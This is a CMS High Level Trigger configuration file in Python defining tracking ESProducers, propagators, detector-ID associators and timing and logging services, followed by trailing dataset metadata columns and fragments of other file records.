hltESPPixelCPETemplateReco = cms.ESProducer( "PixelCPETemplateRecoESProducer",
LoadTemplatesFromDB = cms.bool( True ),
Alpha2Order = cms.bool( True ),
ClusterProbComputationFlag = cms.int32( 0 ),
useLAWidthFromDB = cms.bool( True ),
lAOffset = cms.double( 0.0 ),
lAWidthBPix = cms.double( 0.0 ),
lAWidthFPix = cms.double( 0.0 ),
doLorentzFromAlignment = cms.bool( False ),
useLAFromDB = cms.bool( True ),
barrelTemplateID = cms.int32( 0 ),
forwardTemplateID = cms.int32( 0 ),
directoryWithTemplates = cms.int32( 0 ),
speed = cms.int32( -2 ),
UseClusterSplitter = cms.bool( False ),
ComponentName = cms.string( "hltESPPixelCPETemplateReco" ),
appendToDataLabel = cms.string( "" )
)
hltESPPixelLessStepChi2ChargeMeasurementEstimator16 = cms.ESProducer( "Chi2ChargeMeasurementEstimatorESProducer",
MaxChi2 = cms.double( 16.0 ),
nSigma = cms.double( 3.0 ),
MaxDisplacement = cms.double( 0.5 ),
MaxSagitta = cms.double( 2.0 ),
MinimalTolerance = cms.double( 0.5 ),
MinPtForHitRecoveryInGluedDet = cms.double( 1000000.0 ),
ComponentName = cms.string( "hltESPPixelLessStepChi2ChargeMeasurementEstimator16" ),
pTChargeCutThreshold = cms.double( -1.0 ),
clusterChargeCut = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutTight" ) ),
appendToDataLabel = cms.string( "" )
)
hltESPPixelLessStepClusterShapeHitFilter = cms.ESProducer( "ClusterShapeHitFilterESProducer",
ComponentName = cms.string( "hltESPPixelLessStepClusterShapeHitFilter" ),
PixelShapeFile = cms.string( "RecoPixelVertexing/PixelLowPtUtilities/data/pixelShapePhase1_noL1.par" ),
PixelShapeFileL1 = cms.string( "RecoPixelVertexing/PixelLowPtUtilities/data/pixelShapePhase1_loose.par" ),
clusterChargeCut = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutTight" ) )
)
hltESPPixelLessStepTrajectoryCleanerBySharedHits = cms.ESProducer( "TrajectoryCleanerESProducer",
ComponentName = cms.string( "hltESPPixelLessStepTrajectoryCleanerBySharedHits" ),
ComponentType = cms.string( "TrajectoryCleanerBySharedHits" ),
fractionShared = cms.double( 0.11 ),
ValidHitBonus = cms.double( 5.0 ),
MissingHitPenalty = cms.double( 20.0 ),
allowSharedFirstHit = cms.bool( True )
)
hltESPPixelPairStepChi2ChargeMeasurementEstimator9 = cms.ESProducer( "Chi2ChargeMeasurementEstimatorESProducer",
MaxChi2 = cms.double( 9.0 ),
nSigma = cms.double( 3.0 ),
MaxDisplacement = cms.double( 0.5 ),
MaxSagitta = cms.double( 2.0 ),
MinimalTolerance = cms.double( 0.5 ),
MinPtForHitRecoveryInGluedDet = cms.double( 1.0E12 ),
ComponentName = cms.string( "hltESPPixelPairStepChi2ChargeMeasurementEstimator9" ),
pTChargeCutThreshold = cms.double( 15.0 ),
clusterChargeCut = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutLoose" ) ),
appendToDataLabel = cms.string( "" )
)
hltESPPixelPairStepChi2MeasurementEstimator25 = cms.ESProducer( "Chi2MeasurementEstimatorESProducer",
MaxChi2 = cms.double( 25.0 ),
nSigma = cms.double( 3.0 ),
MaxDisplacement = cms.double( 100.0 ),
MaxSagitta = cms.double( -1.0 ),
MinimalTolerance = cms.double( 10.0 ),
MinPtForHitRecoveryInGluedDet = cms.double( 1000000.0 ),
ComponentName = cms.string( "hltESPPixelPairStepChi2MeasurementEstimator25" ),
appendToDataLabel = cms.string( "" )
)
hltESPPixelPairTrajectoryCleanerBySharedHits = cms.ESProducer( "TrajectoryCleanerESProducer",
ComponentName = cms.string( "hltESPPixelPairTrajectoryCleanerBySharedHits" ),
ComponentType = cms.string( "TrajectoryCleanerBySharedHits" ),
fractionShared = cms.double( 0.19 ),
ValidHitBonus = cms.double( 5.0 ),
MissingHitPenalty = cms.double( 20.0 ),
allowSharedFirstHit = cms.bool( True )
)
hltESPRKTrajectoryFitter = cms.ESProducer( "KFTrajectoryFitterESProducer",
ComponentName = cms.string( "hltESPRKTrajectoryFitter" ),
Propagator = cms.string( "hltESPRungeKuttaTrackerPropagator" ),
Updator = cms.string( "hltESPKFUpdator" ),
Estimator = cms.string( "hltESPChi2MeasurementEstimator30" ),
RecoGeometry = cms.string( "hltESPGlobalDetLayerGeometry" ),
minHits = cms.int32( 3 ),
appendToDataLabel = cms.string( "" )
)
hltESPRKTrajectorySmoother = cms.ESProducer( "KFTrajectorySmootherESProducer",
ComponentName = cms.string( "hltESPRKTrajectorySmoother" ),
Propagator = cms.string( "hltESPRungeKuttaTrackerPropagator" ),
Updator = cms.string( "hltESPKFUpdator" ),
Estimator = cms.string( "hltESPChi2MeasurementEstimator30" ),
RecoGeometry = cms.string( "hltESPGlobalDetLayerGeometry" ),
errorRescaling = cms.double( 100.0 ),
minHits = cms.int32( 3 ),
appendToDataLabel = cms.string( "" )
)
hltESPRungeKuttaTrackerPropagator = cms.ESProducer( "PropagatorWithMaterialESProducer",
SimpleMagneticField = cms.string( "" ),
MaxDPhi = cms.double( 1.6 ),
ComponentName = cms.string( "hltESPRungeKuttaTrackerPropagator" ),
Mass = cms.double( 0.105 ),
PropagationDirection = cms.string( "alongMomentum" ),
useRungeKutta = cms.bool( True ),
ptMin = cms.double( -1.0 )
)
hltESPSmartPropagator = cms.ESProducer( "SmartPropagatorESProducer",
ComponentName = cms.string( "hltESPSmartPropagator" ),
TrackerPropagator = cms.string( "PropagatorWithMaterial" ),
MuonPropagator = cms.string( "hltESPSteppingHelixPropagatorAlong" ),
PropagationDirection = cms.string( "alongMomentum" ),
Epsilon = cms.double( 5.0 )
)
hltESPSmartPropagatorAny = cms.ESProducer( "SmartPropagatorESProducer",
ComponentName = cms.string( "hltESPSmartPropagatorAny" ),
TrackerPropagator = cms.string( "PropagatorWithMaterial" ),
MuonPropagator = cms.string( "SteppingHelixPropagatorAny" ),
PropagationDirection = cms.string( "alongMomentum" ),
Epsilon = cms.double( 5.0 )
)
hltESPSmartPropagatorAnyOpposite = cms.ESProducer( "SmartPropagatorESProducer",
ComponentName = cms.string( "hltESPSmartPropagatorAnyOpposite" ),
TrackerPropagator = cms.string( "PropagatorWithMaterialOpposite" ),
MuonPropagator = cms.string( "SteppingHelixPropagatorAny" ),
PropagationDirection = cms.string( "oppositeToMomentum" ),
Epsilon = cms.double( 5.0 )
)
hltESPSoftLeptonByDistance = cms.ESProducer( "LeptonTaggerByDistanceESProducer",
distance = cms.double( 0.5 )
)
hltESPSteppingHelixPropagatorAlong = cms.ESProducer( "SteppingHelixPropagatorESProducer",
ComponentName = cms.string( "hltESPSteppingHelixPropagatorAlong" ),
NoErrorPropagation = cms.bool( False ),
PropagationDirection = cms.string( "alongMomentum" ),
useTuningForL2Speed = cms.bool( False ),
useIsYokeFlag = cms.bool( True ),
endcapShiftInZNeg = cms.double( 0.0 ),
SetVBFPointer = cms.bool( False ),
AssumeNoMaterial = cms.bool( False ),
endcapShiftInZPos = cms.double( 0.0 ),
useInTeslaFromMagField = cms.bool( False ),
VBFName = cms.string( "VolumeBasedMagneticField" ),
useEndcapShiftsInZ = cms.bool( False ),
sendLogWarning = cms.bool( False ),
useMatVolumes = cms.bool( True ),
debug = cms.bool( False ),
ApplyRadX0Correction = cms.bool( True ),
useMagVolumes = cms.bool( True ),
returnTangentPlane = cms.bool( True )
)
hltESPSteppingHelixPropagatorOpposite = cms.ESProducer( "SteppingHelixPropagatorESProducer",
ComponentName = cms.string( "hltESPSteppingHelixPropagatorOpposite" ),
NoErrorPropagation = cms.bool( False ),
PropagationDirection = cms.string( "oppositeToMomentum" ),
useTuningForL2Speed = cms.bool( False ),
useIsYokeFlag = cms.bool( True ),
endcapShiftInZNeg = cms.double( 0.0 ),
SetVBFPointer = cms.bool( False ),
AssumeNoMaterial = cms.bool( False ),
endcapShiftInZPos = cms.double( 0.0 ),
useInTeslaFromMagField = cms.bool( False ),
VBFName = cms.string( "VolumeBasedMagneticField" ),
useEndcapShiftsInZ = cms.bool( False ),
sendLogWarning = cms.bool( False ),
useMatVolumes = cms.bool( True ),
debug = cms.bool( False ),
ApplyRadX0Correction = cms.bool( True ),
useMagVolumes = cms.bool( True ),
returnTangentPlane = cms.bool( True )
)
hltESPStripCPEfromTrackAngle = cms.ESProducer( "StripCPEESProducer",
ComponentName = cms.string( "hltESPStripCPEfromTrackAngle" ),
ComponentType = cms.string( "StripCPEfromTrackAngle" ),
parameters = cms.PSet(
mTIB_P1 = cms.double( 0.202 ),
maxChgOneMIP = cms.double( 6000.0 ),
mTEC_P0 = cms.double( -1.885 ),
mTOB_P1 = cms.double( 0.253 ),
mTEC_P1 = cms.double( 0.471 ),
mLC_P2 = cms.double( 0.3 ),
mLC_P1 = cms.double( 0.618 ),
mTOB_P0 = cms.double( -1.026 ),
mLC_P0 = cms.double( -0.326 ),
useLegacyError = cms.bool( False ),
mTIB_P0 = cms.double( -0.742 ),
mTID_P1 = cms.double( 0.433 ),
mTID_P0 = cms.double( -1.427 )
)
)
hltESPTTRHBWithTrackAngle = cms.ESProducer( "TkTransientTrackingRecHitBuilderESProducer",
StripCPE = cms.string( "hltESPStripCPEfromTrackAngle" ),
ComponentName = cms.string( "hltESPTTRHBWithTrackAngle" ),
PixelCPE = cms.string( "hltESPPixelCPEGeneric" ),
Matcher = cms.string( "StandardMatcher" ),
ComputeCoarseLocalPositionFromDisk = cms.bool( False )
)
hltESPTTRHBuilderAngleAndTemplate = cms.ESProducer( "TkTransientTrackingRecHitBuilderESProducer",
StripCPE = cms.string( "hltESPStripCPEfromTrackAngle" ),
ComponentName = cms.string( "hltESPTTRHBuilderAngleAndTemplate" ),
PixelCPE = cms.string( "hltESPPixelCPETemplateReco" ),
Matcher = cms.string( "StandardMatcher" ),
ComputeCoarseLocalPositionFromDisk = cms.bool( False )
)
hltESPTTRHBuilderPixelOnly = cms.ESProducer( "TkTransientTrackingRecHitBuilderESProducer",
StripCPE = cms.string( "Fake" ),
ComponentName = cms.string( "hltESPTTRHBuilderPixelOnly" ),
PixelCPE = cms.string( "hltESPPixelCPEGeneric" ),
Matcher = cms.string( "StandardMatcher" ),
ComputeCoarseLocalPositionFromDisk = cms.bool( False )
)
hltESPTTRHBuilderWithoutAngle4PixelTriplets = cms.ESProducer( "TkTransientTrackingRecHitBuilderESProducer",
StripCPE = cms.string( "Fake" ),
ComponentName = cms.string( "hltESPTTRHBuilderWithoutAngle4PixelTriplets" ),
PixelCPE = cms.string( "hltESPPixelCPEGeneric" ),
Matcher = cms.string( "StandardMatcher" ),
ComputeCoarseLocalPositionFromDisk = cms.bool( False )
)
hltESPTobTecStepChi2ChargeMeasurementEstimator16 = cms.ESProducer( "Chi2ChargeMeasurementEstimatorESProducer",
MaxChi2 = cms.double( 16.0 ),
nSigma = cms.double( 3.0 ),
MaxDisplacement = cms.double( 0.5 ),
MaxSagitta = cms.double( 2.0 ),
MinimalTolerance = cms.double( 0.5 ),
MinPtForHitRecoveryInGluedDet = cms.double( 1000000.0 ),
ComponentName = cms.string( "hltESPTobTecStepChi2ChargeMeasurementEstimator16" ),
pTChargeCutThreshold = cms.double( -1.0 ),
clusterChargeCut = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutTight" ) ),
appendToDataLabel = cms.string( "" )
)
hltESPTobTecStepClusterShapeHitFilter = cms.ESProducer( "ClusterShapeHitFilterESProducer",
ComponentName = cms.string( "hltESPTobTecStepClusterShapeHitFilter" ),
PixelShapeFile = cms.string( "RecoPixelVertexing/PixelLowPtUtilities/data/pixelShapePhase1_noL1.par" ),
PixelShapeFileL1 = cms.string( "RecoPixelVertexing/PixelLowPtUtilities/data/pixelShapePhase1_loose.par" ),
clusterChargeCut = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutTight" ) )
)
hltESPTobTecStepFittingSmoother = cms.ESProducer( "KFFittingSmootherESProducer",
ComponentName = cms.string( "hltESPTobTecStepFitterSmoother" ),
Fitter = cms.string( "hltESPTobTecStepRKFitter" ),
Smoother = cms.string( "hltESPTobTecStepRKSmoother" ),
EstimateCut = cms.double( 30.0 ),
MaxFractionOutliers = cms.double( 0.3 ),
MaxNumberOfOutliers = cms.int32( 3 ),
MinDof = cms.int32( 2 ),
NoOutliersBeginEnd = cms.bool( False ),
MinNumberOfHits = cms.int32( 7 ),
MinNumberOfHitsHighEta = cms.int32( 5 ),
HighEtaSwitch = cms.double( 5.0 ),
RejectTracks = cms.bool( True ),
BreakTrajWith2ConsecutiveMissing = cms.bool( False ),
NoInvalidHitsBeginEnd = cms.bool( False ),
LogPixelProbabilityCut = cms.double( -16.0 ),
appendToDataLabel = cms.string( "" )
)
hltESPTobTecStepFittingSmootherForLoopers = cms.ESProducer( "KFFittingSmootherESProducer",
ComponentName = cms.string( "hltESPTobTecStepFitterSmootherForLoopers" ),
Fitter = cms.string( "hltESPTobTecStepRKFitterForLoopers" ),
Smoother = cms.string( "hltESPTobTecStepRKSmootherForLoopers" ),
EstimateCut = cms.double( 30.0 ),
MaxFractionOutliers = cms.double( 0.3 ),
MaxNumberOfOutliers = cms.int32( 3 ),
MinDof = cms.int32( 2 ),
NoOutliersBeginEnd = cms.bool( False ),
MinNumberOfHits = cms.int32( 7 ),
MinNumberOfHitsHighEta = cms.int32( 5 ),
HighEtaSwitch = cms.double( 5.0 ),
RejectTracks = cms.bool( True ),
BreakTrajWith2ConsecutiveMissing = cms.bool( False ),
NoInvalidHitsBeginEnd = cms.bool( False ),
LogPixelProbabilityCut = cms.double( -16.0 ),
appendToDataLabel = cms.string( "" )
)
hltESPTobTecStepFlexibleKFFittingSmoother = cms.ESProducer( "FlexibleKFFittingSmootherESProducer",
ComponentName = cms.string( "hltESPTobTecStepFlexibleKFFittingSmoother" ),
standardFitter = cms.string( "hltESPTobTecStepFitterSmoother" ),
looperFitter = cms.string( "hltESPTobTecStepFitterSmootherForLoopers" ),
appendToDataLabel = cms.string( "" )
)
hltESPTobTecStepRKTrajectoryFitter = cms.ESProducer( "KFTrajectoryFitterESProducer",
ComponentName = cms.string( "hltESPTobTecStepRKFitter" ),
Propagator = cms.string( "PropagatorWithMaterialParabolicMf" ),
Updator = cms.string( "hltESPKFUpdator" ),
Estimator = cms.string( "hltESPChi2MeasurementEstimator30" ),
RecoGeometry = cms.string( "hltESPDummyDetLayerGeometry" ),
minHits = cms.int32( 7 ),
appendToDataLabel = cms.string( "" )
)
hltESPTobTecStepRKTrajectoryFitterForLoopers = cms.ESProducer( "KFTrajectoryFitterESProducer",
ComponentName = cms.string( "hltESPTobTecStepRKFitterForLoopers" ),
Propagator = cms.string( "PropagatorWithMaterialForLoopers" ),
Updator = cms.string( "hltESPKFUpdator" ),
Estimator = cms.string( "hltESPChi2MeasurementEstimator30" ),
RecoGeometry = cms.string( "hltESPDummyDetLayerGeometry" ),
minHits = cms.int32( 7 ),
appendToDataLabel = cms.string( "" )
)
hltESPTobTecStepRKTrajectorySmoother = cms.ESProducer( "KFTrajectorySmootherESProducer",
ComponentName = cms.string( "hltESPTobTecStepRKSmoother" ),
Propagator = cms.string( "PropagatorWithMaterialParabolicMf" ),
Updator = cms.string( "hltESPKFUpdator" ),
Estimator = cms.string( "hltESPChi2MeasurementEstimator30" ),
RecoGeometry = cms.string( "hltESPDummyDetLayerGeometry" ),
errorRescaling = cms.double( 10.0 ),
minHits = cms.int32( 7 ),
appendToDataLabel = cms.string( "" )
)
hltESPTobTecStepRKTrajectorySmootherForLoopers = cms.ESProducer( "KFTrajectorySmootherESProducer",
ComponentName = cms.string( "hltESPTobTecStepRKSmootherForLoopers" ),
Propagator = cms.string( "PropagatorWithMaterialForLoopers" ),
Updator = cms.string( "hltESPKFUpdator" ),
Estimator = cms.string( "hltESPChi2MeasurementEstimator30" ),
RecoGeometry = cms.string( "hltESPDummyDetLayerGeometry" ),
errorRescaling = cms.double( 10.0 ),
minHits = cms.int32( 7 ),
appendToDataLabel = cms.string( "" )
)
hltESPTobTecStepTrajectoryCleanerBySharedHits = cms.ESProducer( "TrajectoryCleanerESProducer",
ComponentName = cms.string( "hltESPTobTecStepTrajectoryCleanerBySharedHits" ),
ComponentType = cms.string( "TrajectoryCleanerBySharedHits" ),
fractionShared = cms.double( 0.09 ),
ValidHitBonus = cms.double( 5.0 ),
MissingHitPenalty = cms.double( 20.0 ),
allowSharedFirstHit = cms.bool( True )
)
hltESPTrackAlgoPriorityOrder = cms.ESProducer( "TrackAlgoPriorityOrderESProducer",
ComponentName = cms.string( "hltESPTrackAlgoPriorityOrder" ),
algoOrder = cms.vstring( ),
appendToDataLabel = cms.string( "" )
)
hltESPTrackerRecoGeometryESProducer = cms.ESProducer( "TrackerRecoGeometryESProducer",
usePhase2Stacks = cms.bool( False ),
trackerGeometryLabel = cms.untracked.string( "" ),
appendToDataLabel = cms.string( "" )
)
hltESPTrajectoryCleanerBySharedHits = cms.ESProducer( "TrajectoryCleanerESProducer",
ComponentName = cms.string( "hltESPTrajectoryCleanerBySharedHits" ),
ComponentType = cms.string( "TrajectoryCleanerBySharedHits" ),
fractionShared = cms.double( 0.5 ),
ValidHitBonus = cms.double( 100.0 ),
MissingHitPenalty = cms.double( 0.0 ),
allowSharedFirstHit = cms.bool( False )
)
hltESPTrajectoryFitterRK = cms.ESProducer( "KFTrajectoryFitterESProducer",
ComponentName = cms.string( "hltESPTrajectoryFitterRK" ),
Propagator = cms.string( "hltESPRungeKuttaTrackerPropagator" ),
Updator = cms.string( "hltESPKFUpdator" ),
Estimator = cms.string( "hltESPChi2MeasurementEstimator30" ),
RecoGeometry = cms.string( "hltESPDummyDetLayerGeometry" ),
minHits = cms.int32( 3 ),
appendToDataLabel = cms.string( "" )
)
hltESPTrajectorySmootherRK = cms.ESProducer( "KFTrajectorySmootherESProducer",
ComponentName = cms.string( "hltESPTrajectorySmootherRK" ),
Propagator = cms.string( "hltESPRungeKuttaTrackerPropagator" ),
Updator = cms.string( "hltESPKFUpdator" ),
Estimator = cms.string( "hltESPChi2MeasurementEstimator30" ),
RecoGeometry = cms.string( "hltESPDummyDetLayerGeometry" ),
errorRescaling = cms.double( 100.0 ),
minHits = cms.int32( 3 ),
appendToDataLabel = cms.string( "" )
)
hltPixelTracksCleanerBySharedHits = cms.ESProducer( "PixelTrackCleanerBySharedHitsESProducer",
ComponentName = cms.string( "hltPixelTracksCleanerBySharedHits" ),
useQuadrupletAlgo = cms.bool( False ),
appendToDataLabel = cms.string( "" )
)
hltTrackCleaner = cms.ESProducer( "TrackCleanerESProducer",
ComponentName = cms.string( "hltTrackCleaner" ),
appendToDataLabel = cms.string( "" )
)
hoDetIdAssociator = cms.ESProducer( "DetIdAssociatorESProducer",
ComponentName = cms.string( "HODetIdAssociator" ),
etaBinSize = cms.double( 0.087 ),
nEta = cms.int32( 30 ),
nPhi = cms.int32( 72 ),
hcalRegion = cms.int32( 2 ),
includeBadChambers = cms.bool( False ),
includeGEM = cms.bool( False ),
includeME0 = cms.bool( False )
)
multipleScatteringParametrisationMakerESProducer = cms.ESProducer( "MultipleScatteringParametrisationMakerESProducer",
appendToDataLabel = cms.string( "" )
)
muonDetIdAssociator = cms.ESProducer( "DetIdAssociatorESProducer",
ComponentName = cms.string( "MuonDetIdAssociator" ),
etaBinSize = cms.double( 0.125 ),
nEta = cms.int32( 48 ),
nPhi = cms.int32( 48 ),
hcalRegion = cms.int32( 2 ),
includeBadChambers = cms.bool( False ),
includeGEM = cms.bool( False ),
includeME0 = cms.bool( False )
)
muonSeededTrajectoryCleanerBySharedHits = cms.ESProducer( "TrajectoryCleanerESProducer",
ComponentName = cms.string( "muonSeededTrajectoryCleanerBySharedHits" ),
ComponentType = cms.string( "TrajectoryCleanerBySharedHits" ),
fractionShared = cms.double( 0.1 ),
ValidHitBonus = cms.double( 1000.0 ),
MissingHitPenalty = cms.double( 1.0 ),
allowSharedFirstHit = cms.bool( True )
)
navigationSchoolESProducer = cms.ESProducer( "NavigationSchoolESProducer",
ComponentName = cms.string( "SimpleNavigationSchool" ),
SimpleMagneticField = cms.string( "ParabolicMf" )
)
preshowerDetIdAssociator = cms.ESProducer( "DetIdAssociatorESProducer",
ComponentName = cms.string( "PreshowerDetIdAssociator" ),
etaBinSize = cms.double( 0.1 ),
nEta = cms.int32( 60 ),
nPhi = cms.int32( 30 ),
hcalRegion = cms.int32( 2 ),
includeBadChambers = cms.bool( False ),
includeGEM = cms.bool( False ),
includeME0 = cms.bool( False )
)
siPixelQualityESProducer = cms.ESProducer( "SiPixelQualityESProducer",
siPixelQualityLabel = cms.string( "" )
)
siPixelTemplateDBObjectESProducer = cms.ESProducer( "SiPixelTemplateDBObjectESProducer" )
siStripBackPlaneCorrectionDepESProducer = cms.ESProducer( "SiStripBackPlaneCorrectionDepESProducer",
LatencyRecord = cms.PSet(
label = cms.untracked.string( "" ),
record = cms.string( "SiStripLatencyRcd" )
),
BackPlaneCorrectionPeakMode = cms.PSet(
label = cms.untracked.string( "peak" ),
record = cms.string( "SiStripBackPlaneCorrectionRcd" )
),
BackPlaneCorrectionDeconvMode = cms.PSet(
label = cms.untracked.string( "deconvolution" ),
record = cms.string( "SiStripBackPlaneCorrectionRcd" )
)
)
siStripLorentzAngleDepESProducer = cms.ESProducer( "SiStripLorentzAngleDepESProducer",
LatencyRecord = cms.PSet(
label = cms.untracked.string( "" ),
record = cms.string( "SiStripLatencyRcd" )
),
LorentzAnglePeakMode = cms.PSet(
label = cms.untracked.string( "peak" ),
record = cms.string( "SiStripLorentzAngleRcd" )
),
LorentzAngleDeconvMode = cms.PSet(
label = cms.untracked.string( "deconvolution" ),
record = cms.string( "SiStripLorentzAngleRcd" )
)
)
sistripconn = cms.ESProducer( "SiStripConnectivity" )
trackerTopology = cms.ESProducer( "TrackerTopologyEP",
appendToDataLabel = cms.string( "" )
)
FastTimerService = cms.Service( "FastTimerService",
printEventSummary = cms.untracked.bool( False ),
printRunSummary = cms.untracked.bool( True ),
printJobSummary = cms.untracked.bool( True ),
writeJSONSummary = cms.untracked.bool( False ),
jsonFileName = cms.untracked.string( "resources.json" ),
enableDQM = cms.untracked.bool( True ),
enableDQMbyModule = cms.untracked.bool( False ),
enableDQMbyPath = cms.untracked.bool( False ),
enableDQMbyLumiSection = cms.untracked.bool( True ),
enableDQMbyProcesses = cms.untracked.bool( True ),
enableDQMTransitions = cms.untracked.bool( False ),
dqmTimeRange = cms.untracked.double( 2000.0 ),
dqmTimeResolution = cms.untracked.double( 5.0 ),
dqmMemoryRange = cms.untracked.double( 1000000.0 ),
dqmMemoryResolution = cms.untracked.double( 5000.0 ),
dqmPathTimeRange = cms.untracked.double( 100.0 ),
dqmPathTimeResolution = cms.untracked.double( 0.5 ),
dqmPathMemoryRange = cms.untracked.double( 1000000.0 ),
dqmPathMemoryResolution = cms.untracked.double( 5000.0 ),
dqmModuleTimeRange = cms.untracked.double( 40.0 ),
dqmModuleTimeResolution = cms.untracked.double( 0.2 ),
dqmModuleMemoryRange = cms.untracked.double( 100000.0 ),
dqmModuleMemoryResolution = cms.untracked.double( 500.0 ),
dqmLumiSectionsRange = cms.untracked.uint32( 2500 ),
dqmPath = cms.untracked.string( "HLT/TimerService" ),
)
MessageLogger = cms.Service( "MessageLogger",
suppressWarning = cms.untracked.vstring( 'hltOnlineBeamSpot',
'hltCtf3HitL1SeededWithMaterialTracks',
'hltL3MuonsOIState',
'hltPixelTracksForHighMult',
'hltHITPixelTracksHE',
'hltHITPixelTracksHB',
'hltCtfL1SeededWithMaterialTracks',
'hltRegionalTracksForL3MuonIsolation',
'hltSiPixelClusters',
'hltActivityStartUpElectronPixelSeeds',
'hltLightPFTracks',
'hltPixelVertices3DbbPhi',
'hltL3MuonsIOHit',
'hltPixelTracks',
'hltSiPixelDigis',
'hltL3MuonsOIHit',
'hltL1SeededElectronGsfTracks',
'hltL1SeededStartUpElectronPixelSeeds',
'hltBLifetimeRegionalCtfWithMaterialTracksbbPhiL1FastJetFastPV',
'hltCtfActivityWithMaterialTracks' ),
suppressFwkInfo = cms.untracked.vstring( ),
suppressInfo = cms.untracked.vstring( ),
suppressDebug = cms.untracked.vstring( ),
debugModules = cms.untracked.vstring( ),
cerr = cms.untracked.PSet(
INFO = cms.untracked.PSet( limit = cms.untracked.int32( 0 ) ),
noTimeStamps = cms.untracked.bool( False ),
FwkReport = cms.untracked.PSet(
reportEvery = cms.untracked.int32( 1 ),
limit = cms.untracked.int32( 0 )
),
default = cms.untracked.PSet( limit = cms.untracked.int32( 10000000 ) ),
Root_NoDictionary = cms.untracked.PSet( limit = cms.untracked.int32( 0 ) ),
FwkJob = cms.untracked.PSet( limit = cms.untracked.int32( 0 ) ),
FwkSummary = cms.untracked.PSet(
reportEvery = cms.untracked.int32( 1 ),
limit = cms.untracked.int32( 10000000 )
),
threshold = cms.untracked.string( "INFO" ),
),
suppressError = cms.untracked.vstring( 'hltOnlineBeamSpot',
'hltL3MuonCandidates',
'hltL3TkTracksFromL2OIState',
'hltPFJetCtfWithMaterialTracks',
'hltL3TkTracksFromL2IOHit',
'hltL3TkTracksFromL2OIHit' )
)
ThroughputService = cms.Service( "ThroughputService",
eventRange = cms.untracked.uint32( 10000 ),
eventResolution = cms.untracked.uint32( 1 ),
printEventSummary = cms.untracked.bool( False ),
enableDQM = cms.untracked.bool( True ),
dqmPathByProcesses = cms.untracked.bool( False ),
dqmPath = cms.untracked.string( "HLT/Throughput" ),
timeRange = cms.untracked.double( 60000.0 ),
timeResolution = cms.untracked.double( 5.828 )
)
| 44.672243
| 131
| 0.742549
| 30,547
| 320,434
| 7.594428
| 0.067077
| 0.049774
| 0.024415
| 0.018673
| 0.813123
| 0.805429
| 0.768047
| 0.75815
| 0.74593
| 0.740757
| 0
| 0.060904
| 0.143618
| 320,434
| 7,172
| 132
| 44.678472
| 0.784486
| 0.000318
| 0
| 0.752549
| 1
| 0
| 0.266718
| 0.234816
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.00014
| 0
| 0.00014
| 0.000698
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
ab3042eaebbb9fa9a769b95786f6268255448380
| 79
|
py
|
Python
|
finitewave/cpuwave3D/model/luo_rudy91_3d/__init__.py
|
ArsOkenov/Finitewave
|
14274d74be824a395b47a5c53ba18188798ab70d
|
[
"MIT"
] | null | null | null |
finitewave/cpuwave3D/model/luo_rudy91_3d/__init__.py
|
ArsOkenov/Finitewave
|
14274d74be824a395b47a5c53ba18188798ab70d
|
[
"MIT"
] | null | null | null |
finitewave/cpuwave3D/model/luo_rudy91_3d/__init__.py
|
ArsOkenov/Finitewave
|
14274d74be824a395b47a5c53ba18188798ab70d
|
[
"MIT"
] | 2
|
2021-10-05T13:38:56.000Z
|
2022-03-05T15:58:08.000Z
|
from finitewave.cpuwave3D.model.luo_rudy91_3d.luo_rudy91_3d import LuoRudy913D
| 39.5
| 78
| 0.898734
| 12
| 79
| 5.583333
| 0.75
| 0.268657
| 0.328358
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.133333
| 0.050633
| 79
| 1
| 79
| 79
| 0.76
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
ab395a42e8f312446e5087de9cf66c1ac9e414a1
| 73
|
py
|
Python
|
loghandler/modules/__init__.py
|
math280h/loghandler
|
7e752493df91e49b3b205fda2829e6e7b8cc050c
|
[
"MIT"
] | 2
|
2021-11-05T17:56:33.000Z
|
2021-11-07T01:58:01.000Z
|
loghandler/modules/__init__.py
|
math280h/loghandler
|
7e752493df91e49b3b205fda2829e6e7b8cc050c
|
[
"MIT"
] | 33
|
2021-11-05T02:09:29.000Z
|
2022-03-23T11:09:45.000Z
|
loghandler/modules/__init__.py
|
math280h/loghandler
|
7e752493df91e49b3b205fda2829e6e7b8cc050c
|
[
"MIT"
] | null | null | null |
import loghandler.modules.elasticsearch
import loghandler.modules.stdout
| 24.333333
| 39
| 0.890411
| 8
| 73
| 8.125
| 0.625
| 0.492308
| 0.707692
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.054795
| 73
| 2
| 40
| 36.5
| 0.942029
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
db4b4cdf8c7983277974c6738546ec921665546a
| 260
|
py
|
Python
|
iridauploader/parsers/__init__.py
|
COMBAT-SARS-COV-2/irida-uploader
|
b9d04d187d6a5a9fdcaef5b27135965ffac99db0
|
[
"Apache-2.0"
] | 7
|
2019-01-25T16:56:11.000Z
|
2021-01-12T15:32:08.000Z
|
